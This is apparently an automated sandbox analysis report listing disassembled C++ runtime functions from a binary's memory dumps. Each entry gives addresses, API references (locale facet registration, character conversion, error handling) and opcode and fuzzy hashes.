Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 027a0296ad6a7e9d13fc5d07de8afa29cf3e2d7cf26dccb9360f6f11f8903932
Instruction ID: 3d5c7db72d894c78826fa1c962fb8e402ba071d8a6e8d0ec7e81751fc1f3d6f5
Opcode Fuzzy Hash: 027a0296ad6a7e9d13fc5d07de8afa29cf3e2d7cf26dccb9360f6f11f8903932
Instruction Fuzzy Hash: D5119E75808229DBCF05FBA4C880ABDB7B5AF44718F274019F511AB390DF75AA058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEB74C, Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDEB753
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEB75D
int.LIBCPMT ref: 6DDEB774

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

collate.LIBCPMT ref: 6DDEB797
std::_Facet_Register.LIBCPMT ref: 6DDEB7AE
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEB7CE
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEB7EC

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: d8fbf201ef8516ef6cb8ecf5a9be8ef2c403d496a8939bc5601c038f16aa7e76
Instruction ID: c68fa22ac923e395c933a7d78cf59c5f2ce7efb9c90f6a9c99e934996a84f3eb
Opcode Fuzzy Hash: d8fbf201ef8516ef6cb8ecf5a9be8ef2c403d496a8939bc5601c038f16aa7e76
Instruction Fuzzy Hash: F211A37680822DDBCF01FB64C880ABEB7B5AF44714F270409F515AB390DF74AA058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF60D, Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDDF614
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF61E
int.LIBCPMT ref: 6DDDF635

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDDF658
std::_Facet_Register.LIBCPMT ref: 6DDDF66F
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF68F
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF6AD

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 716f3e79ecaae237e6095b677acc57259edcdc344010730dd68e59d646e5167e
Instruction ID: 602ef580a4b8db3b586205e244ce8c8c676d56bf65174133b35bdfaca1598f52
Opcode Fuzzy Hash: 716f3e79ecaae237e6095b677acc57259edcdc344010730dd68e59d646e5167e
Instruction Fuzzy Hash: B911C2B5908119DBCF05FB64C840BFDB7B4AF94718F27041AF521AB291DF7499018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF183, Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDDF18A
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF194
int.LIBCPMT ref: 6DDDF1AB

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

messages.LIBCPMT ref: 6DDDF1CE
std::_Facet_Register.LIBCPMT ref: 6DDDF1E5
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF205
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF223

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 03910cc5c898f47b0e47ee505217858be00cbde8d9fb26c40d3fc11dbdf8d8ee
Instruction ID: ed7608197176dff12b9ddfeccd9af5085c96ace93621fcba128217e95e180beb
Opcode Fuzzy Hash: 03910cc5c898f47b0e47ee505217858be00cbde8d9fb26c40d3fc11dbdf8d8ee
Instruction Fuzzy Hash: 3411A076848119DBCF05FBA4D840EFDB775AF84718F26040AFA21AB294DF749A01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDA059, Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDDA060
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA06A
int.LIBCPMT ref: 6DDDA081

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

codecvt.LIBCPMT ref: 6DDDA0A4
std::_Facet_Register.LIBCPMT ref: 6DDDA0BB
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA0DB
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDA0F9

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcodecvt
String ID:
API String ID: 2594415655-0
Opcode ID: b76bb4d383eff6eab2d90ca5f56578182d69aab4f1542592980d83d2bcce9b07
Instruction ID: 7be3cc326aec7e48e3d7ee1cb679a32b68b3b7e0ffdd710f85e3806aa0e47c20
Opcode Fuzzy Hash: b76bb4d383eff6eab2d90ca5f56578182d69aab4f1542592980d83d2bcce9b07
Instruction Fuzzy Hash: B311A376845119DBCF01FB64C840ABDB774AF54714F264409F511BB290DF749905C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDA2F1, Relevance: 10.6, APIs: 7, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDDA2F8
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDA302
int.LIBCPMT ref: 6DDDA319

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

numpunct.LIBCPMT ref: 6DDDA33C
std::_Facet_Register.LIBCPMT ref: 6DDDA353
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDA373
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDA391

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 8bea813ad8111ae6e1886fd90ab2a867af19652c378264e9144d7225030b89f5
Instruction ID: 85bd4964444798d3d36a94313e3e4f6fe62d2968a05bc83804077c70f5d24f54
Opcode Fuzzy Hash: 8bea813ad8111ae6e1886fd90ab2a867af19652c378264e9144d7225030b89f5
Instruction Fuzzy Hash: DA11C275909229DBCF01FBA4C840EFDB7B5AF55318F264409F611AB290DF74AA02CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2621F, Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6DE0F290,6DE0F290,?,?,?,6DE26470,00000001,00000001,C5E85006), ref: 6DE26279
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6DE26470,00000001,00000001,C5E85006,?,?,?), ref: 6DE262FF
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6DE263F9
__freea.LIBCMT ref: 6DE26406

Part of subcall function 6DE1F26D: RtlAllocateHeap.NTDLL(00000000,6DDD75D9,00000000,?,6DDF0F8B,00000002,00000000,?,?,?,6DDB1298,6DDD75D9,00000004,00000000,00000000,00000000), ref: 6DE1F29F

__freea.LIBCMT ref: 6DE2640F
__freea.LIBCMT ref: 6DE26434

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 25f975c53777719d74ac421ec2a0050de15cf8de94f43032ee22a27bbe908009
Instruction ID: a48f696055bdb0d6cf257d5a19897a6c62e2f6985eaa3b743e5ba3b883be2494
Opcode Fuzzy Hash: 25f975c53777719d74ac421ec2a0050de15cf8de94f43032ee22a27bbe908009
Instruction Fuzzy Hash: E051AE72610216ABEF198F64CC40FBB37A9EB84758B22432DFD54E6240DF74DC5586E0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF42C8, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6DDF3EDB,6DDEFA25,6DDEFD54,?,6DDEFF71,?,00000001,?,?,00000001,?,6DE927E0,0000000C,6DDF006E), ref: 6DDF42D6
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6DDF42E4
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6DDF42FD
SetLastError.KERNEL32(00000000,6DDEFF71,?,00000001,?,?,00000001,?,6DE927E0,0000000C,6DDF006E,?,00000001,?), ref: 6DDF434F

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 09fe271c6fb6809dcae415d77db46eeee4cd319af7e06215d88df79d3030a3cc
Instruction ID: 0a0898ca8aaf7780835daf699c228aa51d5735cdf4f2104252a4fc61a2e5fdd9
Opcode Fuzzy Hash: 09fe271c6fb6809dcae415d77db46eeee4cd319af7e06215d88df79d3030a3cc
Instruction Fuzzy Hash: E601D43224E726DFEA1437B4ADA5B7626F5EB0777A723022BF224490E4EF1148139194

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF94B, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDDF952
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF95C
int.LIBCPMT ref: 6DDDF973

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF9AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF9CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF9EB

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 4d7e49b2ec3a08e265c53fff8721504f1d049d8e83f0d2349f2243ff37b8776f
Instruction ID: fe127b5d29b24984ca32e0db06c4e73b001b37d174a637273c0f848458037c65
Opcode Fuzzy Hash: 4d7e49b2ec3a08e265c53fff8721504f1d049d8e83f0d2349f2243ff37b8776f
Instruction Fuzzy Hash: 0C11C275D08269DBCF01FB64C850AFDB775AF54318F26400AF615AB290DF749A018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEB93E, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDEB945
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEB94F
int.LIBCPMT ref: 6DDEB966

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDEB9A0
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEB9C0
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEB9DE

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: b3f0fec39a1c1d101e6d088bdfe7ab99bcea91bfd743ee11cb03451a37daa347
Instruction ID: db4d7238e819ca79a88e19719a686464c8a51c9d0a5031ed69b9c4a305430bbd
Opcode Fuzzy Hash: b3f0fec39a1c1d101e6d088bdfe7ab99bcea91bfd743ee11cb03451a37daa347
Instruction Fuzzy Hash: E311A075809619DBCF01FB64C850AFDB7B4AF45318F270009F611AB290DF74AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEB898, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDEB89F
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEB8A9
int.LIBCPMT ref: 6DDEB8C0

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDEB8FA
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEB91A
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEB938

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 4e880843ce70f24214e326e0760043496345caf217fe6c184581e64824138f7a
Instruction ID: d1d9904130f745f9a6d38253d43ed02f12eb5ca1398261963f13a339af96ea1f
Opcode Fuzzy Hash: 4e880843ce70f24214e326e0760043496345caf217fe6c184581e64824138f7a
Instruction Fuzzy Hash: 2611A075808219DBCF01FB64C840ABDB775AF44358F270509F611AB290DF74AE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDFBE3, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDDFBEA
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDFBF4
int.LIBCPMT ref: 6DDDFC0B

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDFC45
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDFC65
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDFC83

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 4a442c5eadf99eaf13806179c74916b9bbcdb0963d065960e9d0006820467f5c
Instruction ID: a9d47e72587acc106a881c1edc03ff837dfe81169af9d293e6b95feb553fb368
Opcode Fuzzy Hash: 4a442c5eadf99eaf13806179c74916b9bbcdb0963d065960e9d0006820467f5c
Instruction Fuzzy Hash: D411A075908119DBCF01FB64C880BFDB7B5AF44318F264009F911AB290DFB49A01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDFB3D, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDDFB44
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDFB4E
int.LIBCPMT ref: 6DDDFB65

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDFB9F
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDFBBF
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDFBDD

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 0f0a13ce8ead1fb1b6acc6818fc48d9863d8d27d4da0f0b3f7540db5e2871e5c
Instruction ID: 92ac90ec6d29870d8730f7e506127764c0181f985cc4cd0c1530a2e1bd5af46c
Opcode Fuzzy Hash: 0f0a13ce8ead1fb1b6acc6818fc48d9863d8d27d4da0f0b3f7540db5e2871e5c
Instruction Fuzzy Hash: 2811CEB2808119DBCF05FB64C850ABEB774AF84318F27040AF611AB290DF74AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDFA97, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDDFA9E
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDFAA8
int.LIBCPMT ref: 6DDDFABF

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDFAF9
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDFB19
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDFB37

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 5fc3d0fa7fb59c04805897762f0a3a720383c609969c3c6e0f3634ec20bf2073
Instruction ID: e84f50caa7cc29c33f6f960e22e3ac69ec8b3bedaca0da897098b19e45adb461
Opcode Fuzzy Hash: 5fc3d0fa7fb59c04805897762f0a3a720383c609969c3c6e0f3634ec20bf2073
Instruction Fuzzy Hash: 4911A076908119DBCF01FBA4C850ABEB775AF44318F27401AF621AB290DF74AA018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF41B, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDDF422
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF42C
int.LIBCPMT ref: 6DDDF443

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF47D
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF49D
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF4BB

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 182489b249fe5c564a567d8061c37cff6646487a21f907bfab3cdc006d3c09fc
Instruction ID: 373a08f35aae25ac05fb9cab24362190690f31eb4c8c08d96c165a004f03a9ef
Opcode Fuzzy Hash: 182489b249fe5c564a567d8061c37cff6646487a21f907bfab3cdc006d3c09fc
Instruction Fuzzy Hash: B4110272909119DBCF01FB60C850AFDB779BF84318F260009F621AB290DF7099018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF7FF, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDDF806
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF810
int.LIBCPMT ref: 6DDDF827

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF861
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF881
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF89F

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 94c14ca8e652a076e7fb8e08818092dcdc2a170ad2daafdd03954d91af0e7b46
Instruction ID: dff0bfb73086c13a237b9bc4e56fdf795f002a7c8c7845eb5fcb98381e57db69
Opcode Fuzzy Hash: 94c14ca8e652a076e7fb8e08818092dcdc2a170ad2daafdd03954d91af0e7b46
Instruction Fuzzy Hash: D411C6B5948229DBCF05FBA4C850BFDB775AF84718F260009F511AB290DF749A0187E2

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD4747, Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDD474E
std::_Lockit::_Lockit.LIBCPMT ref: 6DDD4758
int.LIBCPMT ref: 6DDD476F

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDD47A9
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDD47BF
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD47DD

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
